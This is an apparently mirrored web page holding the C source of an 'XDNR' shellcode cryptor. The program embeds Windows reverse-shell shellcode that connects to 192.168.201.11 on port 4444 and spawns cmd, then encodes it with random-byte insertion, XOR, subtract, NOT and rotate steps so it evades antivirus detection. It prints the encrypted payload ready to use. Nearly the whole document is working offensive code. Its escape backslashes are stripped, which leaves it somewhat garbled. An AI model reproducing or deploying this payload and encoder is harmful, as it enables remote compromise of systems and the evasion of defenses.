Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

XDNR Shellcode Cryptor Encoder

Details
Category: Vulnerabilities
Hits: 280

/**
*
* ____ ___________ _______ __________
* / /\______ \______
* / | | / |
/**
*
* ____ ___________ _______ __________
* / /\______ \______
* / | | / | | _/
* / | ` / | |
* /___/ /_______ /\____|__ /____|_ /
* \_/ / / /
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* [*] X0R Cryptor with DEC/N0T/R0R encoder plus random byte insertion
* [*] Author: @xen0vas
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#define DEC 0x2 // the value that will be used to substract every byte

#define ANSI_COLOR_RED "x1b[01;31m"
#define ANSI_COLOR_GREEN "x1b[01;32m"
#define ANSI_COLOR_YELLOW "x1b[01;33m"
#define ANSI_COLOR_BLUE "x1b[01;34m"
#define ANSI_COLOR_MAGENTA "x1b[01;35m"
#define ANSI_COLOR_CYAN "x1b[01;36m"
#define ANSI_COLOR_RESET "x1b[0m"

unsigned char XORKEY[] = { 0x73, 0x65, 0x63, 0x72, 0x65, 0x74, 0x6B, 0x65, 0x79 }; // secretkey

/* https://www.exploit-db.com/shellcodes/50291 */
unsigned char shellcode[] =
"x31xc9x64x8bx41x30x8bx40x0cx8bx70x14xadx96xadx96xadx8b"
"x58x10x8bx53x3cx01xdax8bx52x78x01xdax8bx72x20x01xdex31"
"xc9x41xadx01xd8x81x38x47x65x74x50x75xf4x81x78x04x72x6f"
"x63x41x75xebx81x78x08x64x64x72x65x75xe2x8bx72x24x01xde"
"x66x8bx0cx4ex49x8bx72x1cx01xdex8bx14x8ex01xdax31xc9x53"
"x52x51x68x61x72x79x41x68x4cx69x62x72x68x4cx6fx61x64x54"
"x53x89xdexffxd2x83xc4x0cx5ax50x52x66xbax6cx6cx52x68x33"
"x32x2ex64x68x77x73x32x5fx54xffxd0x83xc4x10x8bx54x24x04"
"x68x75x70x61x61x66x81x6cx24x02x61x61x68x74x61x72x74x68"
"x57x53x41x53x54x50x89xc7xffxd2x31xdbx66xbbx90x01x29xdc"
"x54x53xffxd0x83xc4x10x31xdbx80xc3x04x6bxdbx64x8bx14x1c"
"x68x74x41x61x61x66x81x6cx24x02x61x61x68x6fx63x6bx65x68"
"x57x53x41x53x54x89xf8x50xffxd2x57x31xc9x52x52x52xb2x06"
"x52x41x51x41x51xffxd0x91x5fx83xc4x10x31xdbx80xc3x04x6b"
"xdbx63x8bx14x1cx68x65x63x74x61x66x83x6cx24x03x61x68x63"
"x6fx6ex6ex54x57x87xcdxffxd2x68xc0xa8xc9x0bx66x68x11x5c"
"x31xdbx80xc3x02x66x53x89xe2x6ax10x52x55x87xefxffxd0x83"
"xc4x14x31xdbx80xc3x04x6bxdbx62x8bx14x1cx68x73x41x61x61"
"x81x6cx24x02x61x61x00x00x68x6fx63x65x73x68x74x65x50x72"
"x68x43x72x65x61x54x89xf5x55xffxd2x50x8dx28x68x63x6dx64"
"x61x66x83x6cx24x03x61x89xe1x31xd2x83xecx10x89xe3x57x57"
"x57x52x52x31xc0x40xc1xc0x08x50x52x52x52x52x52x52x52x52"
"x52x52x31xc0x04x2cx50x89xe0x53x50x52x52x52x31xc0x40x50"
"x52x52x51x52xffxd5";

void banner(){
printf(ANSI_COLOR_YELLOW);
printf(" ");
printf(" ▄ ▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ");
printf(" ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░░▌ ▐░▌▐░░░░░░░░░░░▌ ");
printf(" ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌░▌ ▐░▌▐░█▀▀▀▀▀▀▀█░▌ ");
printf(" ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ");
printf(" ▐░▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ");
printf(" ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ");
printf(" ▐░▌░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▀▀▀▀█░█▀▀ ");
printf(" ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌ ");
printf(" ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▐░▌▐░▌ ▐░▌ ");
printf(" ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░▌ ▐░░▌▐░▌ ▐░▌ ");
printf(" ▀ ▀ ▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀ ▀ ▀ ");
printf(" ");
printf("[*] Author:"ANSI_COLOR_MAGENTA" @xen0vas "ANSI_COLOR_RESET" ");
}

int main(void)
{
banner();
printf(ANSI_COLOR_YELLOW"[*] X0R Cryptor with DEC/N0T/R0R encoder v1.0.0 ");
printf(ANSI_COLOR_BLUE);
printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ");
printf(ANSI_COLOR_RESET);

int rot,kk,ll,i,l,k,j;

int key_len = sizeof(XORKEY);

lol:

rot = 4; //right rotation 4 bits
unsigned char *buffer = (unsigned char*)malloc(sizeof(unsigned char));
srand((unsigned int)time(NULL));

unsigned char *shellcode2 =(unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );
memset(shellcode2, '', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );

// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "xbb";

unsigned char *shellcode4 = (unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );
memset(shellcode4, '', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) );

l = 0;
k = 0;

// random byte insertion into even location
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

for (i=0; i<((sizeof(shellcode)-1)*2); i++)
{
// generate random bytes
buffer[0] = rand() & 0xff;
memcpy(&shellcode3[0],(char*)&buffer[0],sizeof(buffer[0]));
k = i % 2;
if (k == 0)
{
shellcode2[i] = shellcode[l];
l++;
}
else if ( k != 0 )
{
shellcode2[i] = shellcode3[0];
}
}

kk = 0;
ll = 0;

// Beat the nulls !
buffer[0] = rand() & 0xff;

for (i=0; i<(sizeof(shellcode)-1)*2; i++)
{

if (kk == key_len) kk = 0;

// XOR every byte with secretkey
shellcode2[i] = shellcode2[i] ^ XORKEY[kk];

shellcode2[i] = shellcode2[i] ^ buffer[0];

printf (" "ANSI_COLOR_YELLOW"[!]"ANSI_COLOR_GREEN" The magic byte to avoid nulls :"ANSI_COLOR_RED" 0x%02x"ANSI_COLOR_RESET, buffer[0] );

// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;

// one's complement negation
shellcode2[i] = ~shellcode2[i];

// perform the ROR method
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));

if (shellcode2[i] == 0)
{
free(shellcode4);
free(shellcode2);
free(buffer);
ll++;
break;
}

kk++;
}
if ( ll > 0) goto lol;

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

for (i=0; i<(sizeof(shellcode)-1)*2; i++) {
memcpy(&shellcode4[i], (unsigned char*)&shellcode2[i],sizeof(shellcode2[i]));
}

printf(ANSI_COLOR_YELLOW" [*]"ANSI_COLOR_GREEN" The secret Key : ");
for (int g=0; g<=sizeof(key_len); g++)
{
if (g==sizeof(key_len))
printf(ANSI_COLOR_RED"0x%02x"ANSI_COLOR_RESET, XORKEY[g]);
if (g<sizeof(key_len))
printf(ANSI_COLOR_RED"0x%02x, "ANSI_COLOR_RESET, XORKEY[g]);
}

printf(" "ANSI_COLOR_YELLOW"[*]"ANSI_COLOR_GREEN" Original Shellcode Length : "ANSI_COLOR_RED"%lu ", sizeof(shellcode)-1);

printf(ANSI_COLOR_BLUE);
printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~");
printf(ANSI_COLOR_RESET);

printf(" "ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encrypted shellcode :"ANSI_COLOR_RESET" ");


for (i=0; i<(sizeof(shellcode)-1)*2; i++)
{
if (i==0)
printf(ANSI_COLOR_MAGENTA"unsigned char"ANSI_COLOR_RESET" shellcode[]"ANSI_COLOR_YELLOW" = "ANSI_COLOR_RESET"{ "ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]);
if (i>0 && i<((sizeof(shellcode)-1)*2)-1)
printf(ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]);
if (i == ((sizeof(shellcode)-1)*2)-1)
printf(ANSI_COLOR_YELLOW"0x%02x"ANSI_COLOR_RESET" };",shellcode4[i]);
}

printf("33[01;32m");
printf(" "ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encoded Shellcode Length : "ANSI_COLOR_RED"%ld "ANSI_COLOR_RESET,(sizeof(shellcode)-1)*2);
printf(" ");
return 0;
}

/* @xen0vas */